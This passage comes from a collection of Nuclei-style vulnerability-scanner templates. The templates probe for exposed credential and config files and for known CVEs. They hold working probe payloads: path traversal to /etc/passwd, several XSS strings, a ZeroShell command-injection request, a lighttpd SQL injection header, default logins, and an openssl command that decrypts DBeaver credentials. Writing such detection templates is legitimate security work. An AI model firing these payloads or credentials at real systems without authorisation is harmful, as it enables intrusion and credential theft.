"{{BaseURL}}/.ssh/known_hosts" 14 | - "{{BaseURL}}/.ssh/known_hosts.old" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "ssh-dss" 21 | - "ssh-ed25519" 22 | - "ssh-rsa" 23 | - "ecdsa-sha2-nistp256" 24 | condition: or 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /eyelock-nano-lfd.yaml: -------------------------------------------------------------------------------- 1 | id: eyelock-nano-lfd 2 | 3 | info: 4 | name: EyeLock nano NXT 3.5 - Local File Disclosure 5 | description: 6 | author: geeknik 7 | reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt 8 | severity: high 9 | tags: eyelock,lfd,traversal,iot,biometrics 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: regex 22 | regex: 23 | - "root:[x*]:0:0:" 24 | part: body 25 | -------------------------------------------------------------------------------- /pagespeed-global-admin.yaml: -------------------------------------------------------------------------------- 1 | id: pagespeed-global-admin 2 | 3 | info: 4 | name: Pagespeed Global Admin 5 | author: geeknik 6 | severity: low 7 | tags: pagespeed,admin 8 | 9 | requests: 10 | - method: GET 11 | headers: 12 | X-Client-IP: "127.0.0.1" 13 | X-Remote-IP: "127.0.0.1" 14 | X-Remote-Addr: "127.0.0.1" 15 | X-Forwarded-For: "127.0.0.1" 16 | X-Originating-IP: "127.0.0.1" 17 | X-Host: "127.0.0.1" 18 | X-Forwarded-Host: "127.0.0.1" 19 | 20 | path: 21 | - "{{BaseURL}}/pagespeed-global-admin/" 22 | 23 | matchers: 24 | - type: word 25 | words: 26 | - "X-Mod-Pagespeed" 27 | part: header 28 | -------------------------------------------------------------------------------- /salesforce-login.yaml: -------------------------------------------------------------------------------- 1 | id: salesforce-login 2 | 3 | info: 4 | name: Salesforce Credentials 5 | author: geeknik 6 | severity: high 7 | tags: salesforce,auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/js/salesforce.js" 13 | - "{{BaseURL}}/salesforce.js" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "jsforce.Connection" 27 | - "conn.login" 28 | - "conn.query" 29 | condition: and 30 | -------------------------------------------------------------------------------- /swagger-xss.yaml: -------------------------------------------------------------------------------- 1 | id: swagger-xss 2 | 3 | info: 4 | name: Swagger API XSS 5 | author: geeknik 6 | severity: medium 7 | reference: https://twitter.com/A0x017/status/1371122293921964032 8 | tags: swagger,xss 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/dochelper?userId=<script>alert({{randstr}})</script>" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/html" 21 | - type: word 22 | part: body 23 | words: 24 | - "<script>alert({{randstr}})</script>" 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /ventrilo-config.yaml: -------------------------------------------------------------------------------- 1 | id: ventrilo-config 2 | 3 | info: 4 | name: Ventrilo Configuration File 5 | author: geeknik 6 | reference: https://www.ventrilo.com/setup.php 7 | severity: high 8 | tags: ventrilo,config,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/ventrilo_srv.ini" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: word 22 | words: 23 | - "[Server]" 24 | - "Name" 25 | - "Phonetic" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /CVE-2018-3167.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-3167 2 | 3 | info: 4 | name: Unauthenticated Blind SSRF in Oracle EBS 5 | author: geeknik 6 | severity: low 7 | description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 8 | tags: cve,cve2018,oracle,ebs,ssrf 9 | 10 | requests: 11 | - method: POST 12 | path: 13 | - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp' 14 | 15 | body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://localhost:80"> 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - 'Unexpected text in DTD' 22 | part: body 23 | - type: status 24 | status: 25 | - 200 -------------------------------------------------------------------------------- /ssh-authorized-keys.yaml: -------------------------------------------------------------------------------- 1 | id: ssh-authorized-keys 2 | 3 | info: 4 | name: SSH Authorized Keys 5 | author: geeknik 6 | reference: https://www.ssh.com/academy/ssh/authorized-key 7 | severity: low 8 | tags: config,exposure,ssh 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.ssh/authorized_keys" 14 | - "{{BaseURL}}/_/.ssh/authorized_keys" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "ssh-dss" 21 | - "ssh-ed25519" 22 | - "ssh-rsa" 23 | - "ecdsa-sha2-nistp256" 24 | condition: or 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /circarlife-default-login.yaml: -------------------------------------------------------------------------------- 1 | id: circarlife-default-login 2 | 3 | info: 4 | name: CirCarLife SCADA Default Login 5 | reference: https://www.exploit-db.com/exploits/45384 6 | author: geeknik 7 | severity: critical 8 | tags: circarlife,scada,iot,auth 9 | 10 | requests: 11 | - method: POST 12 | path: 13 | - "{{BaseURL}}/html/setup.html" 14 | headers: 15 | Authorization: "Basic YWRtaW46MTIzNAo=" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: word 23 | words: 24 | - "<title>OCPP Engine - Setup" 25 | - "Application Parameters" 26 | condition: and 27 | -------------------------------------------------------------------------------- /ganglia-xml-grid-monitor.yaml: -------------------------------------------------------------------------------- 1 | id: ganglia-xml-grid-monitor 2 | 3 | info: 4 | name: Ganglia XML Grid Monitor 5 | author: geeknik 6 | description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids. 7 | reference: http://ganglia.info/ 8 | severity: low 9 | tags: ganglia,network 10 | 11 | network: 12 | - inputs: 13 | - data: "\r\n" 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Hostname}}:8649" 18 | read-size: 2048 19 | 20 | matchers: 21 | - type: word 22 | words: 23 | - "SCADmonitor" 24 | - "SCADAmonitor" 25 | condition: or 26 | - type: word 27 | words: 28 | - "SCADAmonitor y su logo son propiedad de tectuus®" 29 | -------------------------------------------------------------------------------- /esmtprc.yaml: -------------------------------------------------------------------------------- 1 | id: esmtprc 2 | 3 | info: 4 | name: esmtprc dotfile 5 | author: geeknik 6 | description: esmtp configuration file 7 | reference: https://linux.die.net/man/5/esmtprc 8 | severity: high 9 | tags: esmtp,config 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/.esmtprc" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "text/plain" 22 | - type: word 23 | part: body 24 | words: 25 | - "hostname" 26 | - "username" 27 | - "password" 28 | condition: and 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /lutron-iot-default-login.yaml: -------------------------------------------------------------------------------- 1 | id: lutron-iot-default-login 2 | 3 | info: 4 | name: Lutron IOT Device Default Login 5 | reference: https://www.lutron.com 6 | author: geeknik 7 | severity: high 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login?login=lutron&password=lutron" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "LUTRON" 19 | - ">DeviceIP" 20 | - ">Get Database Info as XML" 21 | condition: and 22 | - type: word 23 | part: header 24 | words: 25 | - "text/html" 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /ftpconfig.yaml: -------------------------------------------------------------------------------- 1 | id: ftpconfig 2 | 3 | info: 4 | name: Atom remote-ssh ftpconfig 5 | author: geeknik 6 | description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials 7 | severity: high 8 | tags: atom,ftp,config 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.ftpconfig" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "protocol" 27 | - "host" 28 | - "port" 29 | - "user" 30 | condition: and 31 | -------------------------------------------------------------------------------- /sftp-config.yaml: -------------------------------------------------------------------------------- 1 | id: sftp-config 2 | 3 | info: 4 | name: sftp password exposure 5 | author: geeknik 6 | reference: https://blog.sucuri.net/2012/11/psa-sftpftp-password-exposure-via-sftp-config-json.html 7 | severity: high 8 | tags: sftp,config,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/sftp-config.json" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "application/json" 21 | - type: word 22 | words: 23 | - "host\":" 24 | - "user\":" 25 | - "sftp" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /CVE-2021-33904.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-33904 2 | 3 | info: 4 | name: Accela Civic Platform 21.1 - 'servProvCode' XSS 5 | author: geeknik 6 | description: 7 | reference: https://www.exploit-db.com/exploits/49980 8 | severity: medium 9 | tags: cve,cve2021,accela,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}//security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm({{randstr}})%5e%22a2pbrnzx5a9" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "text/html" 21 | - type: word 22 | part: header 23 | words: 24 | - 'k3woq"^confirm({{randstr}})^"a2pbrnzx5a9' 25 | condition: and 26 | -------------------------------------------------------------------------------- /CVE-2018-2894.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-2894 2 | 3 | info: 4 | name: Oracle WebLogic RCE 5 | author: geeknik 6 | description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. 7 | reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ 8 | severity: critical 9 | tags: cve,cve2018,oracle,weblogic,rce 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/ws_utc/config.do" 15 | 16 | redirects: true 17 | matchers: 18 | - type: word 19 | words: 20 | - "* Copyright (c) 2005,2013, Oracle" 21 | - "settings" 22 | condition: and -------------------------------------------------------------------------------- /gmail-api-client-secrets.yaml: -------------------------------------------------------------------------------- 1 | id: gmail-api-client-secrets 2 | 3 | info: 4 | name: GMail API client_secrets.json 5 | author: geeknik 6 | severity: info 7 | description: https://developers.google.com/gmail/api/auth/web-server 8 | tags: config,exposure 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/client_secrets.json" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "client_id" 20 | - "auth_uri" 21 | - "token_uri" 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | - type: word 27 | part: header 28 | words: 29 | - "application/json" 30 | -------------------------------------------------------------------------------- /selea-ip-camera.yaml: -------------------------------------------------------------------------------- 1 | id: selea-ip-camera 2 | info: 3 | name: Detect Selea Targa IP OCR-ANPR Camera 4 | author: geeknik 5 | description: Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php 6 | severity: info 7 | tags: iot 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: header 18 | words: 19 | - "SeleaCPSHttpServer" 20 | - type: word 21 | part: body 22 | words: 23 | - "Selea CarPlateServer" 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /CVE-2014-2323.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2014-2323 2 | 3 | info: 4 | name: lighttpd 1.4.34 SQL injection and path traversal 5 | description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname. 6 | reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt 7 | author: geeknik 8 | severity: info 9 | tags: cve,cve2014,sqli,lighttpd 10 | 11 | requests: 12 | - raw: 13 | - | 14 | GET /etc/passwd HTTP/1.1 15 | Host: [::1]' UNION SELECT '/ 16 | 17 | unsafe: true 18 | redirects: true 19 | matchers: 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0:" 23 | -------------------------------------------------------------------------------- /pyramid-debug-toolbar.yaml: -------------------------------------------------------------------------------- 1 | id: pyramid-debug-toolbar 2 | info: 3 | name: Pyramid Debug Toolbar 4 | author: geeknik 5 | description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application. 6 | reference: https://github.com/Pylons/pyramid_debugtoolbar 7 | severity: medium 8 | tags: pyramid,logs,exposure 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/_debug_toolbar/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Pyramid Debug Toolbar" 20 | - "Pyramid DebugToolbar" 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /redmine-db-config.yaml: -------------------------------------------------------------------------------- 1 | id: redmine-db-config 2 | info: 3 | name: Detect Redmine Database Configuration 4 | author: geeknik 5 | description: Redmine is a flexible project management web application written using Ruby on Rails framework - https://redmine.org/projects/redmine 6 | severity: medium 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/config/database.yml" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'adapter:' 20 | - 'database:' 21 | - 'host:' 22 | - 'production:' 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 -------------------------------------------------------------------------------- /CVE-2017-16806.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-16806 2 | 3 | info: 4 | name: Ulterius Server < 1.9.5.0 - Directory Traversal 5 | author: geeknik 6 | reference: https://www.exploit-db.com/exploits/43141 7 | severity: high 8 | tags: cve,cve2017,ulterius,traversal 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" 14 | - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: regex 22 | regex: 23 | - "root:[x*]:0:0:" 24 | - "\\[(font|extension|file)s\\]" 25 | condition: or 26 | part: body 27 | -------------------------------------------------------------------------------- /avtech-dvr-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: avtech-dvr-exposure 2 | 3 | info: 4 | name: Avtech AVC798HA DVR Information Exposure 5 | description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. 6 | reference: http://www.avtech.com.tw/ 7 | author: geeknik 8 | severity: low 9 | tags: dvr,exposure,avtech 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi-bin/nobody/Machine.cgi?action=get_capability" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "Firmware.Version=" 24 | - "MACAddress=" 25 | - "Product.Type=" 26 | condition: and 27 | -------------------------------------------------------------------------------- /jetty-information-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: jetty-information-disclosure 2 | 3 | info: 4 | name: Jetty 9.4.37 & 9.4.38 Information Disclosure 5 | author: geeknik 6 | reference: http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.117479 7 | severity: low 8 | tags: jetty 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/context/%2e/WEB-INF/web.xml" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "application/xml" 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "" 27 | - "java.sun.com" 28 | condition: and 29 | -------------------------------------------------------------------------------- /zwave2mqtt-health-check.yaml: -------------------------------------------------------------------------------- 1 | id: zwave2mqtt-health-check 2 | 3 | info: 4 | name: Zwave2MQTT Health Check 5 | reference: 6 | - https://github.com/OpenZWave/Zwave2Mqtt#health-check-endpoints 7 | author: geeknik 8 | severity: info 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/health/mqtt" 14 | - "{{BaseURL}}/health/zwave" 15 | headers: 16 | Accept: "text/plain" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - 500 24 | condition: or 25 | - type: word 26 | part: header 27 | words: 28 | - "text/plain" 29 | - type: dsl 30 | dsl: 31 | - "len(body) < 1" 32 | -------------------------------------------------------------------------------- /CVE-2018-11784.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-11784 2 | 3 | info: 4 | name: Apache Tomcat Open Redirect 5 | author: geeknik 6 | description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. 7 | reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E 8 | severity: medium 9 | tags: tomcat,redirect,cve,cve2018 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}//example.com" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" 20 | part: header 21 | -------------------------------------------------------------------------------- /CVE-2021-26475.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-26475 2 | 3 | info: 4 | name: EPrints 3.4.2 XSS 5 | author: geeknik 6 | description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI. 7 | reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf 8 | severity: medium 9 | tags: cve,cve2021,xss,eprints 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | - type: word 22 | part: header 23 | words: 24 | - "text/html" 25 | -------------------------------------------------------------------------------- /config-file.yaml: -------------------------------------------------------------------------------- 1 | id: config-file 2 | 3 | info: 4 | name: Detect Config File 5 | author: geeknik 6 | severity: high 7 | tags: config,auth,api 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/config/default.json" 13 | - "{{BaseURL}}/config.json" 14 | - "{{BaseURL}}/config/config.json" 15 | - "{{BaseURL}}/credentials/config.json" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - '"api_keys":' 22 | - '"accessKey":' 23 | - '"secretKey":' 24 | condition: or 25 | - type: status 26 | status: 27 | - 200 28 | - type: word 29 | words: 30 | - "application/json" 31 | part: header 32 | -------------------------------------------------------------------------------- /django-secret.key.yaml: -------------------------------------------------------------------------------- 1 | id: django-secret-key 2 | 3 | info: 4 | name: Django Secret Key 5 | author: geeknik 6 | severity: high 7 | tags: django 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/settings.py" 13 | - "{{BaseURL}}/app/settings.py" 14 | - "{{BaseURL}}/django/settings.py" 15 | - "{{BaseURL}}/settings/settings.py" 16 | - "{{BaseURL}}/web/settings/settings.py" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | part: body 25 | words: 26 | - "SECRET_KEY =" 27 | - type: word 28 | part: header 29 | words: 30 | - "text/html" 31 | negative: true 32 | -------------------------------------------------------------------------------- /php-timeclock-xss.yaml: -------------------------------------------------------------------------------- 1 | id: php-timeclock-xss 2 | 3 | info: 4 | name: PHP Timeclock 1.04 XSS 5 | author: geeknik 6 | description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities 7 | reference: https://www.exploit-db.com/exploits/49853 8 | severity: medium 9 | tags: timeclock,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=confirm%60xss%60%3E" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "text/html" 22 | - type: word 23 | words: 24 | - "'>" 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /robomongo.yaml: -------------------------------------------------------------------------------- 1 | id: robomongo 2 | 3 | info: 4 | name: Detect robomongo.json 5 | author: geeknik 6 | description: MongoDB credentials file used by RoboMongo 7 | severity: high 8 | tags: mongodb,robomongo,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/db/robomongo.json" 14 | - "{{BaseURL}}/robomongo.json" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "application/json" 22 | - type: word 23 | words: 24 | - "databaseName" 25 | - "userName" 26 | - "userPassword" 27 | - "serverHost" 28 | condition: and 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2018-16670.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16670 2 | 3 | info: 4 | name: CirCarLife SCADA PLC Status 5 | description: PLC status disclosure due to lack of authentication 6 | reference: 7 | - https://www.exploit-db.com/exploits/45384 8 | author: geeknik 9 | severity: medium 10 | tags: cve,cve2018,circarlife,scada,plc,iot,disclosure 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/services/user/values.xml?var=STATUS" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "CirCarLife Scada" 23 | - type: word 24 | part: body 25 | words: 26 | - "" 27 | - "Reader.STATUS" 28 | condition: and 29 | -------------------------------------------------------------------------------- /CVE-2009-0545.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-0545 2 | 3 | info: 4 | name: ZeroShell <= 1.0beta11 Remote Code Execution 5 | author: geeknik 6 | description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. 7 | reference: https://www.exploit-db.com/exploits/8023 8 | severity: critical 9 | tags: cve,cve2009,zeroshell,kerbynet,rce 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" 15 | 16 | matchers: 17 | - type: regex 18 | part: body 19 | regex: 20 | - "root:[x*]:0:0:" 21 | -------------------------------------------------------------------------------- /CVE-2018-12634.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-12634 2 | 3 | info: 4 | name: Exposed CirCarLife System Log 5 | author: geeknik 6 | description: CirCarLife is an internet-connected electric vehicle charging station 7 | reference: https://circontrol.com/ 8 | severity: medium 9 | tags: cve,cve2018,scada,circontrol,circarlife,logs 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/html/log" 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "CirCarLife Scada" 21 | - type: word 22 | words: 23 | - "user.debug" 24 | - "user.info" 25 | - "EVSE" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /CVE-2021-31581.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31581 2 | 3 | info: 4 | name: Akkadian Provisioning Manager MariaDB Credentials 5 | author: geeknik 6 | reference: 7 | - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ 8 | - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ 9 | severity: medium 10 | tags: cve,cve2021,akkadian,mariadb,auth 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/pme/database/pme/phinx.yml" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: word 23 | words: 24 | - "host:" 25 | - "name:" 26 | - "pass:" 27 | condition: and 28 | -------------------------------------------------------------------------------- /dbeaver-credentials.yaml: -------------------------------------------------------------------------------- 1 | id: dbeaver-credentials 2 | 3 | info: 4 | name: DBeaver Credential Exposure 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.dbeaver/credentials-config.json" 12 | # to decode the above file, run this: 13 | # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "application/octet-stream" 23 | part: header 24 | - type: dsl 25 | dsl: 26 | - "len(body) >=200 && len(body) <400" 27 | -------------------------------------------------------------------------------- /remote-sync.yaml: -------------------------------------------------------------------------------- 1 | id: remote-sync 2 | 3 | info: 4 | name: Remote Sync for Atom credentials 5 | author: geeknik 6 | description: Created by remote-sync for Atom, contains FTP and/or SCP/SFTP/SSH server details and credentials 7 | severity: high 8 | tags: atom,sftp,scp,ssh,ftp 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.remote-sync.json" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | part: header 22 | words: 23 | - "application/json" 24 | - type: word 25 | words: 26 | - "Remote Sync" 27 | - "hostname" 28 | - "username" 29 | - "password" 30 | condition: and 31 | -------------------------------------------------------------------------------- /CVE-2018-16668.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16668 2 | 3 | info: 4 | name: CirCarLife SCADA Installation Paths 5 | description: System software installation path disclosure due to lack of authentication 6 | reference: 7 | - https://www.exploit-db.com/exploits/45384 8 | author: geeknik 9 | severity: medium 10 | tags: cve,cve2018,circarlife,scada,iot,disclosure 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/html/repository" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "CirCarLife Scada" 23 | - type: word 24 | part: body 25 | words: 26 | - "** Platform sources **" 27 | - "** Application sources **" 28 | condition: and 29 | -------------------------------------------------------------------------------- /CVE-2020-22840.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-22840 2 | 3 | info: 4 | name: b2evolution CMS Open redirect 5 | author: geeknik 6 | severity: low 7 | description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. 8 | tags: cve,cve2020,redirect,b2evolution 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com" 14 | 15 | matchers: 16 | - type: regex 17 | regex: 18 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' 19 | part: header 20 | -------------------------------------------------------------------------------- /CVE-2020-29164.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-29164 2 | 3 | info: 4 | name: PacsOne Server XSS 5 | description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS). 6 | author: geeknik 7 | severity: medium 8 | tags: pacsone,xss,cve,cve2020 9 | reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - "text/html" 22 | part: header 23 | 24 | - type: word 25 | words: 26 | - '1' 27 | part: body 28 | -------------------------------------------------------------------------------- /chamilo-lms-xss.yaml: -------------------------------------------------------------------------------- 1 | id: chamilo-lms-xss 2 | 3 | info: 4 | name: Chamilo LMS Cross Site Scripting 5 | author: geeknik 6 | severity: medium 7 | description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ 8 | tags: xss,chamilo 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - 'agenda_js.php?type=xss" onmouseover=alert(document.domain)' 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | part: 